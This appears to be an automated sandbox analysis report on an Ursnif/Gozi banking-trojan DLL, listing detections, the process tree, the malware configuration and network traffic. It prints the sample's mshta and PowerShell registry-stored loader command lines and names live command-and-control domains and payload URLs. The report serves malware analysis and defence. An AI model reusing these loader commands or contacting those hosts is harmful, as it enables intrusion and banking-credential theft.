Analysis Report SecuriteInfo.com.Generic.mg.f76b81b0397ae313.25278

Overview

General Information

Sample Name: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.25278 (renamed file extension from 25278 to dll)
Analysis ID: 353281
MD5: f76b81b0397ae313b8f6d19d95c49edf
SHA1: 8f15106b524cc5db564845508a04ee3bf2709949
SHA256: 3e8b92cda2c0d1dc74de0b060f43c2baf23ab08af69667ddbbe66f78d5e0389a

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5576 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll' MD5: 8081BC925DFC69D40463079233C90FA5)
    • regsvr32.exe (PID: 5876 cmdline: regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 5528 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • rundll32.exe (PID: 6488 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • cmd.exe (PID: 1440 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • iexplore.exe (PID: 1380 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 6192 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6552 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6864 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6940 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82978 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 492 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5424 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4136 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5732 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6124 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 2920 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6908 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9090.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "353", "system": "2f28121f12f6b0f75396fd38214a7a6chh0N", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613433491", "user": "902d52678695dc15e71ab15c1d8e8ed0", "hash": "0xf857f57e", "soft": "3"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp | GoziRule | Win32.Gozi | CCN-CERT | 0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

          Sigma Overview

          System Summary:

          Sigma detected: Dot net compiler compiles file from suspicious location
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5424, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', ProcessId: 4136
          Sigma detected: MSHTA Spawning Windows Shell
          Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 492, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5424
          Sigma detected: Suspicious Rundll32 Activity
          Source: Process startedAuthor: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5528, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 6488

          Signature Overview

          AV Detection:

          Antivirus detection for URL or domain
          Source: http://c56.lepini.at/jvassets/xI/t64.dat; Avira URL Cloud: Label: phishing
          Found malware configuration
          Source: regsvr32.exe.5876.2.memstr; Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "353", "system": "2f28121f12f6b0f75396fd38214a7a6chh0N", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613433491", "user": "902d52678695dc15e71ab15c1d8e8ed0", "hash": "0xf857f57e", "soft": "3"}
          Multi AV Scanner detection for domain / URL
          Source: c56.lepini.at; Virustotal: Detection: 8%
          Source: api3.lepini.at; Virustotal: Detection: 10%
          Source: api10.laptok.at; Virustotal: Detection: 10%
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll; Virustotal: Detection: 16%
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll; ReversingLabs: Detection: 10%

          Compliance:

          Uses 32bit PE files
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
          Uses new MSVCR Dlls
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
          Uses secure TLS version for HTTPS connections
          Binary contains paths to debug symbols
          Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.810092544.0000017964DD0000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.818415180.0000022D72ED0000.00000002.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
          Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
          Source: Binary string: \wl.pdb9 source: powershell.exe, 00000017.00000003.858136800.000001F6E100F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033F3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_033F3512
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB7500 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,32_2_04DB7500
          Source: C:\Windows\explorer.exeCode function: 32_2_04DBAACC CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,32_2_04DBAACC
          Source: global traffic; HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
          Source: Joe Sandbox View; IP Address: 104.20.184.68
          Source: Joe Sandbox View; IP Address: 151.101.1.44
          Source: Joe Sandbox View; ASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
          Source: Joe Sandbox View; JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
          Source: unknownDNS traffic detected: queries for: www.msn.com
          Source: unknownHTTP traffic detected: POST /api1/Khaq04rDnev_2/FB_2BFzU/KI8bdPSAY3R_2FidTJv71m3/dvU3r7d2eL/scd3pdNtCTeJ_2Frq/OWGS0ExfsOsM/_2BPwAW1LdR/SHcm3WZGYcVW6D/WtMm_2BnA73XtQqx5ww7P/YAGrQTEZeVeHRogx/_2B99ZfB_2FmilX/7ChN3r52DnFdh04GaB/pT5_2FX83/Scw9iSPgYS8zehsLEcf9/v_2BuI3_2FeSXD8dbjK/TGxhWKgJt8_2B4wSzTBFun/2pwogTmb20mC4/H981V6qe/2_2BDwr9k_2Bpe4F_2BBGiU/1EiWwRg_2F/w_2FIQs5ggG07bgU_/2BwAzRket4TL/oTov HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Content-Length: 2Host: api3.lepini.at
          Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 15 Feb 2021 23:58:11 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
          Source: regsvr32.exe, 00000002.00000003.779376557.000000000362E000.00000004.00000001.sdmp, explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FN
          Source: explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJk
          Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
          Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
          Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
          Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000017.00000002.859665043.000001F6C8B31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000020.00000002.1020876214.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000017.00000003.858426776.000001F6E137C000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoft.co
          Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: explorer.exe, 00000020.00000000.844032000.000000000A897000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          Yara detected Ursnif
          Source: Yara match; File source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
          Source: Yara match; File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
          Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY

          E-Banking Fraud:

          Yara detected Ursnif
          Source: Yara match, File source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
          Source: Yara match, File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
          Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY
          Disables SPDY (HTTP compression, likely to perform web injects)
          Source: C:\Windows\explorer.exe, Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

          System Summary:

          Malicious sample detected (through community Yara rule)
          Writes or reads registry keys via WMI
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Writes registry values via WMI
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_033F4F73 GetProcAddress,NtCreateSection,memset
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_033F11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_033F34D0 NtMapViewOfSection
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 2_2_033FB159 NtQueryVirtualMemory
          Source: C:\Windows\explorer.exe, Code function: 32_2_04DAC458 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose
          Source: C:\Windows\explorer.exe, Code function: 32_2_04DA1C74 NtQuerySystemInformation
          Source: C:\Windows\explorer.exe, Code function: 32_2_04DC9584 NtReadVirtualMemory
          Source: C:\Windows\explorer.exe, Code function: 32_2_04DA7D44 NtQueryInformationProcess
          Source: C:\Windows\explorer.exe, Code function: 32_2_04DC1EEC NtCreateSection
          Source: C:\Windows\explorer.exe, Code function: 32_2_04DAF640 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose
          Source: C:\Windows\explorer.exe, Code function: 32_2_04DBEF14 NtMapViewOfSection
          Source: C:\Windows\explorer.exe, Code function: 32_2_04DCF9A4 NtAllocateVirtualMemory
          Source: C:\Windows\explorer.exe, Code function: 32_2_04DCC130 NtWriteVirtualMemory
          Source: C:\Windows\explorer.exe, Code function: 32_2_04DB1A9C RtlAllocateHeap,NtQueryInformationProcess
          Source: C:\Windows\explorer.exe, Code function: 32_2_04DB2BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread
          Source: C:\Windows\explorer.exe, Code function: 32_2_04DC9B4C NtQueryInformationProcess
          Source: C:\Windows\explorer.exe, Code function: 32_2_04DE1002 NtProtectVirtualMemory,NtProtectVirtualMemory
          Source: C:\Windows\System32\control.exe, Code function: 33_2_00DCF9A4 NtAllocateVirtualMemory
          Source: C:\Windows\System32\control.exe, Code function: 33_2_00DCC130 NtWriteVirtualMemory
          Source: C:\Windows\System32\control.exe, Code function: 33_2_00DB1A9C NtQueryInformationProcess
          Source: C:\Windows\System32\control.exe, Code function: 33_2_00DB2BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification
          Source: C:\Windows\System32\control.exe, Code function: 33_2_00DC9B4C NtQueryInformationProcess
          Source: C:\Windows\System32\control.exe, Code function: 33_2_00DAC458 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose
          Source: C:\Windows\System32\control.exe, Code function: 33_2_00DC9584 NtReadVirtualMemory
          Source: C:\Windows\System32\control.exe, Code function: 33_2_00DC1EEC NtCreateSection
          Source: C:\Windows\System32\control.exe, Code function: 33_2_00DAF640 NtQueryInformationToken,NtQueryInformationToken,NtClose
          Source: C:\Windows\System32\control.exe, Code function: 33_2_00DBEF14 NtMapViewOfSection
          Source: C:\Windows\System32\control.exe, Code function: 33_2_00DE1002 NtProtectVirtualMemory,NtProtectVirtualMemory
          Source: C:\Windows\System32\rundll32.exe, Code function: 35_2_000001E7A4359B4C NtQueryInformationProcess
          Source: C:\Windows\System32\rundll32.exe, Code function: 35_2_000001E7A433F640 NtQueryInformationToken,NtQueryInformationToken,NtClose
          Source: C:\Windows\System32\rundll32.exe, Code function: 35_2_000001E7A4371002 NtProtectVirtualMemory,NtProtectVirtualMemory
          Source: gayi4abp.dll.26.dr, Static PE information: No import functions for PE file found
          Source: wi0gyoxl.dll.28.dr, Static PE information: No import functions for PE file found
          Source: C:\Windows\System32\mshta.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: sfc.dll
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
          Source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY, Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY, Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 00000016.00000003.789528617.000001F2CB9EF000.00000004.00000001.sdmp, type: MEMORY, Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
          Source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY, Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY, Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY, Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
          Source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY, Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
